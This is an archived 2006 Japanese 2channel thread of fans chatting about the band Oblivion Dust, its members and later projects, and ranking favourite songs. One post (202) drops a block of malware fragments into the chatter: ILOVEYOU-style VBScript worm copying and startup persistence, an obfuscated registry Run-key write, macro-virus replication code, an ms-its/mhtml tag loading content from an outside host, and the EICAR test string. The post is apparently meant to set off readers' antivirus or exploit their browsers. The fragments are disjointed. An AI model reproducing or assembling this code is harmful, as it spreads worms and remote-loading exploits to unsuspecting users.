>>173 5/4のやつ?

クソ田の日記ttp://blog.livedoor.jp/area014/

176 :伝説の名無しさん:2006/07/07(金) 18:12:19
ロンドンに帰っちゃったんだ
何か稲田ってほんとKAZの事好きだな てかチャンドンゴンってカズに似てるの?

177 :伝説の名無しさん:2006/07/08(土) 03:00:05
HYDEヲタって恐いね、ホント。
monoralにまだヲタ張り付いてんじゃん。
あそこも良かったのにすっかり変わったね。
KAZもヲタにのっとられなきゃいいが。

178 :伝説の名無しさん:2006/07/08(土) 08:14:06
キチガイファンが勝手に盛り上がってくれて勘違いした岩池が素敵バンドを
やってくれれば嬉しいが。

179 :伝説の名無しさん:2006/07/08(土) 11:50:46
オブリの時はKAZしゃんかっこいい なんて言う人いなかったらから
今の状況嬉しいんだろうな

180 :伝説の名無しさん:2006/07/08(土) 12:38:00
キャズは当分灰度から離れそうにないな
ケンやリキジとは縁が切れたんだろうか

181 :伝説の名無しさん:2006/07/08(土) 16:59:20
リキジは4月のAXでやった灰土ライヴに来てたらしいよ
メガG友達の人が言ってた

182 :伝説の名無しさん:2006/07/08(土) 18:52:48
ブンブンってずっと外国のバンドだと思ってら日本人だったんだね
ここ最近で一番の衝撃だ

183 :伝説の名無しさん:2006/07/08(土) 19:05:02
父ちゃんのファンサイトもいい感じで好きだったのに
最近変なのが来るようになった。

>>177
もう既に乗っ取られているような・・・。

>>178
素敵バンド(笑)は嬉しいが、キチガイももれなく
一緒について来そうだな。

184 :伝説の名無しさん:2006/07/08(土) 19:53:22
ハイドから離れたとしても保留になってる意味わからん稲田との
ユニットの活動とかしれない・・・

185 :伝説の名無しさん:2006/07/08(土) 20:54:34
ホント、フルトンファンサイトは最近ヒデーね。

179
オブリの時、結構KAZファンいたけど。


186 :伝説の名無しさん:2006/07/08(土) 22:35:45
ハイヲタはちょっとは遠慮ってゆうものを知ってほしいよ

187 :伝説の名無しさん:2006/07/08(土) 23:22:18
遠慮ってゆものを知ってるハイヲタは表に出てこないんじゃない。

188 :伝説の名無しさん:2006/07/09(日) 00:07:26
ハイドはどんな人か知らないが
ヲタの基地害ぶりをみるとちょっと気の毒だな

189 :伝説の名無しさん:2006/07/09(日) 00:59:35
まああんだけ売れてたんだからしょうがないよね

190 :伝説の名無しさん:2006/07/09(日) 16:23:14
マサルって今何してんの?

191 :伝説の名無しさん:2006/07/10(月) 14:07:30
セクシーコマンドー

192 :伝説の名無しさん:2006/07/10(月) 18:52:17
>191
それすごいよマサルさんじゃんw

193 :伝説の名無しさん:2006/07/10(月) 19:52:46
なつかしい〜〜〜!

194 :伝説の名無しさん:2006/07/10(月) 20:55:02
ほんとに猿の話題は聞かないな・・・

195 :伝説の名無しさん:2006/07/11(火) 13:06:04
リキジは4月のAXでやった灰土ライヴで…

196 :伝説の名無しさん:2006/07/11(火) 17:19:24
マサルは何かの病気で今は回復にむかってるけど音楽活動はやめるんだって
なんかすごいショックだ・・・

197 :伝説の名無しさん:2006/07/11(火) 20:29:13
セクシーコマン病か。

198 :伝説の名無しさん:2006/07/11(火) 23:04:13
パチスロ病

199 :伝説の名無しさん:2006/07/13(木) 00:03:47
エビ反りきぼん

200 :伝説の名無しさん:2006/07/13(木) 13:43:52
二○○!!

201 :伝説の名無しさん:2006/07/13(木) 22:34:18
初めてオブリのライヴでケンの動き(エビ反り)見た時はほんと驚いたなあ
この人はきっと背骨がないって思った。

202 :伝説の名無しさん:2006/07/13(木) 23:02:39
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???

203 :伝説の名無しさん:2006/07/13(木) 23:52:51
制服姿の男子高生の3人組が、初めてオブリのライブに来たのか
ロイドのエビ反りにえらく興奮しててワロタ
やっぱりあれは初めて見る人には衝撃なのかw
ライブで、本能のままに動いて
何をしだすか分からない野性児なロイドは好きだ
ヘリウムラブを初めてライブで体験した時は
こいつヤベーwwww完全にイッてるwって思って、
あの男子高生と同じくらい衝撃受けた

204 :伝説の名無しさん:2006/07/14(金) 19:00:34
ロイドって誰

205 :伝説の名無しさん:2006/07/14(金) 19:27:02
元祖・エビゾリシンガーですよ

206 :伝説の名無しさん:2006/07/15(土) 15:07:03
体柔いんですね裏山


207 :伝説の名無しさん:2006/07/15(土) 23:15:30
あんなに反れん

208 :伝説の名無しさん:2006/07/16(日) 03:19:38
ゴキブリが出て本でつぶそうとしたらかすっちゃって
シンコレの段ボール箱の中に落ちて入っちゃった。
そのまま水責めにして退治したけどシンコレボックスは

すてるはめに

209 :伝説の名無しさん:2006/07/16(日) 11:32:49
役割を全うしてお亡くなりになったシンコレボックスに安らかな眠りを…


ゴキは水攻めでちゃんと死んだのか?

210 :伝説の名無しさん:2006/07/16(日) 18:56:53
ゴキブリ捕獲なんて役割のためにシンコレボックスは生まれてきたのか

211 :伝説の名無しさん:2006/07/16(日) 22:55:15
クソワロタ

212 :伝説の名無しさん:2006/07/16(日) 23:06:11
シンコレボックスってただの邪魔物じゃなかったんだな
これからの季節は役に立ちそう

213 :伝説の名無しさん:2006/07/16(日) 23:15:15
ゴキブリホイホイ・・・ (´ω・`)

214 :伝説の名無しさん:2006/07/17(月) 12:16:55
自分のシンコレボックスどっかいっちゃった

215 :伝説の名無しさん:2006/07/17(月) 21:41:56
やっぱりDISAPPEARが一番の名曲だと思うのですがそこんとこどうでしょうか?

216 :伝説の名無しさん:2006/07/17(月) 21:51:11
Disassociativeの方が好き。

217 :伝説の名無しさん:2006/07/17(月) 22:07:13
オブリの曲の中でね

218 :伝説の名無しさん:2006/07/17(月) 22:23:51
ディサピーアあんまり好きじゃない俺は少数派なんだろうな
俺は何だかんだでセラピーが一番好き

219 :216:2006/07/17(月) 23:15:09
ごめん、誤爆。偶々似た流れだったから間違えた。

220 :伝説の名無しさん:2006/07/18(火) 14:56:55
トラストが一曲目に置かれてるけど、セラピーのほうが個性があって
玄人好み(失礼)しそうでかなりいいと思う

221 :伝説の名無しさん:2006/07/18(火) 20:51:29
DISAPPEAR自分も好きだけどフューチャー・ウォンブの方が好きだな。
DISAPPEARライヴでやってるときは岩池神かと思った w

222 :伝説の名無しさん:2006/07/19(水) 00:01:08
フューチャー・ウォンブ!

223 :伝説の名無しさん:2006/07/19(水) 15:49:23
韓国人の名前みたいだな

224 :伝説の名無しさん:2006/07/19(水) 18:18:05
未来のおんぶ

225 :伝説の名無しさん:2006/07/19(水) 19:06:50
來未の子宮

226 :伝説の名無しさん:2006/07/20(木) 01:07:32
え?

227 :伝説の名無しさん:2006/07/20(木) 01:08:49
ウォンブ笑

228 :伝説の名無しさん:2006/07/20(木) 06:21:22
たまたま誘われたリキッドが初めてで超ドギモ抜かれた!BLITZやらラストのZeppまでライブ行きまくったな。サマソニは大阪だったから行けなかったけど誰か行った人います?

229 :伝説の名無しさん:2006/07/21(金) 21:32:50
ウォンブ!!


230 :伝説の名無しさん:2006/07/22(土) 00:12:55
デシグナーフェトゥス

231 :伝説の名無しさん:2006/07/22(土) 14:33:46
チョラスト!

232 :伝説の名無しさん:2006/07/22(土) 14:35:52
KAZオフィ久しぶりに見たら凄い事になってた・・・


233 :伝説の名無しさん:2006/07/22(土) 17:40:05
230でへ?と思った後に231見て禿藁

234 :伝説の名無しさん:2006/07/23(日) 06:50:09
k

235 :伝説の名無しさん:2006/07/23(日) 09:20:16
売れてなかったのにPV集なんて出せたのはWhy?

236 :伝説の名無しさん:2006/07/23(日) 09:34:21
PV集はそんなに制作費かからないかと。
PVはシングルごとに作るわけだし。
オーバードーズの方が不思議。

237 :伝説の名無しさん:2006/07/23(日) 16:15:49
ライヴビデオもっと見たかったけど金ないからしょうがなかったのか・・・

238 :伝説の名無しさん:2006/07/24(月) 01:15:24
KAZのオフィ無くなったんだね。

239 :伝説の名無しさん:2006/07/24(月) 06:17:31
Fake?好きなんですが、
オブリを初めて聴いてみました。
ミザリーとベストの2枚。

あまり良くなかったです。
S.O.SとDesigner Fetusは良かった。
なんでオブリFANの人があまりFake?を好まなかったか、その理由がちょっと解りました。
Fake?はちょっと爽やか過ぎたのかな。
オブリはやっぱ洋楽っぽいですね。
本格的な人には、やっぱFake?はクソなのかもしれないとも思いました。

240 :伝説の名無しさん:2006/07/24(月) 11:13:38
あーいあむねばごならっちゅうの〜〜♪

241 :伝説の名無しさん:2006/07/24(月) 13:16:41
>>238
あるよつ ttp://www.livemedia.co.jp/kaz/

242 :伝説の名無しさん:2006/07/24(月) 14:49:42
>>239
なにも自分が好きなものをクソ呼ばわりせんでも
俺はどっちも好きだぞ

あと、Fake?が好きならリボーンを聴いてみた方がいい

243 :伝説の名無しさん:2006/07/24(月) 19:22:57
ヘリウムラブ、3拍子の曲ってどうしてこんなに気持ちいいんだろう。
ロイドがこの曲で毎回気持ち良さそうにイッてたのがすごく理解できるw
ていうか3拍子の曲って珍しいよね?
すぐ他に思い浮かばない

244 :伝説の名無しさん:2006/07/24(月) 20:37:24
フォーエバーはなぜベストに入ってないのか

245 :伝説の名無しさん:2006/07/24(月) 20:50:08
自分はDISAPPEARとPLASTIC WINGSが入ってないのが納得いかない



246 :伝説の名無しさん:2006/07/24(月) 21:29:09
Lucky # 10 と Selfish と With Youが入ってるのが納得いかねー

247 :伝説の名無しさん:2006/07/24(月) 22:46:34
Lucky#10はいい
でもwith youは許さねえ


248 :伝説の名無しさん:2006/07/24(月) 22:59:48
with you 好きだ

249 :伝説の名無しさん:2006/07/25(火) 00:00:50
Selfishはかず本人が気に入ってるんだからいいだろうに。
ブラードは気に入ってたのに入ってないが

250 :伝説の名無しさん:2006/07/25(火) 00:21:53
ブラードすげー好き

251 :伝説の名無しさん:2006/07/25(火) 00:32:46
Lucky#10もNo Regretもイラネ

252 :伝説の名無しさん:2006/07/25(火) 00:40:55
じゃあレディオソングとララバイもイラネ
あの2曲に全く魅力を感じない
あ、レディオソングのサビはちょっとだけ好き

253 :伝説の名無しさん:2006/07/25(火) 00:47:19
Girlie Boy Imitation #6が好きな自分は少数派ですか?
ちなみにSo Real (But I don't care)も好きですが。
21stの中では断然Erase!

254 :253:2006/07/25(火) 00:48:32
↑なんか色々間違えてる

255 :伝説の名無しさん:2006/07/25(火) 03:37:12
好きだけど、あえてその曲を好きな曲としてあげるのは少数派かと。
嫌いな人はあんまりいないんでないの。

256 :伝説の名無しさん:2006/07/25(火) 16:40:14
>>239
でもベルゼバブはオブリっぽい曲になったっていうじゃん。
新譜は嫌い?

257 :伝説の名無しさん:2006/07/25(火) 17:11:33
obliっぽいかな、あれ
ロイドには作曲の才能ないと思った


258 :伝説の名無しさん:2006/07/25(火) 18:08:06
ベルゼバブはほんのちょっとだけどギターがオブリっぽいって思った。
てかヒップホップに走ったんだね
何かフェイクのケンはただ下手くそなボーカルにしか聞こえない

259 :伝説の名無しさん:2006/07/25(火) 21:51:15
確かにどっちかっつうとFAKE?のが若々しく歌ってるように聞こえるかも。
オブリのが渋みが出てるというか。まぁある程度渋い気持ちだったんだろうけど。

ベルゼバブでは今のカズに比べたらいい曲書いてると思う。
最初っからセーフゾーン外す気満々な感じが。新しくてイイ。
名曲!みたいなのは出てなかった気もするけど。

逆にFAITHは、オブリの淡い雰囲気の曲が好きな自分なので、
聴いてるうちに良くなるかなとも思ったけどいっこうにならず。
悲しい。

260 :256:2006/07/26(水) 02:59:15
BREATH IN...を買ったんだけど、正直微妙。でもPULSEの英語バージョンは結構好きなんだよな。
まぁ、オブリとは比べるまでもないけど。
FAKE?の新譜がオブリっぽくなったって効いて嬉しかったんだけど、ちょっと違うみたいだね。
でも明日買いに行って来るわ。自分で確かめなきゃいかんな。

261 :伝説の名無しさん:2006/07/26(水) 10:09:59
FAITH聞いた人けっこういるんだね
自分も借りてこよう

262 :伝説の名無しさん:2006/07/26(水) 18:09:09
ベルゼバブの中ではBOOM〜が一番好きかもしれない

263 :伝説の名無しさん:2006/07/28(金) 10:15:42
ジャケによってかずの髪型がまったく違うけど
みんなはいつのカズが好きだった?(過去形)

264 :伝説の名無しさん:2006/07/28(金) 12:31:55
それは「みんなが岩池が好きだった」前提なのだな?

265 :伝説の名無しさん:2006/07/28(金) 12:55:49
髪型だけじゃなく喋り方も違う

266 :伝説の名無しさん:2006/07/28(金) 12:59:58
今の岩池は好きじゃないです

267 :伝説の名無しさん:2006/07/28(金) 15:33:43
そんなに変化あるっけ?
やっぱりエルビスジャケの岩池はやばいよね
しばらく誰だか気付かなくて外国人だと思ってて
気付いた時は身震いした


268 :伝説の名無しさん:2006/07/28(金) 17:55:01
俺も宇宙人とばかり思ってたが、地球人と判明したときは身震いした

269 :伝説の名無しさん:2006/07/28(金) 19:10:27
>>267
変化あるでしょ。デザイナーのPVの髪なんかかなり可哀そうなことになってた

270 :伝説の名無しさん:2006/07/28(金) 19:25:30
>265
しゃべり方が違うって、まさか岩池、今ハキハキしゃべってんのか?

45 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)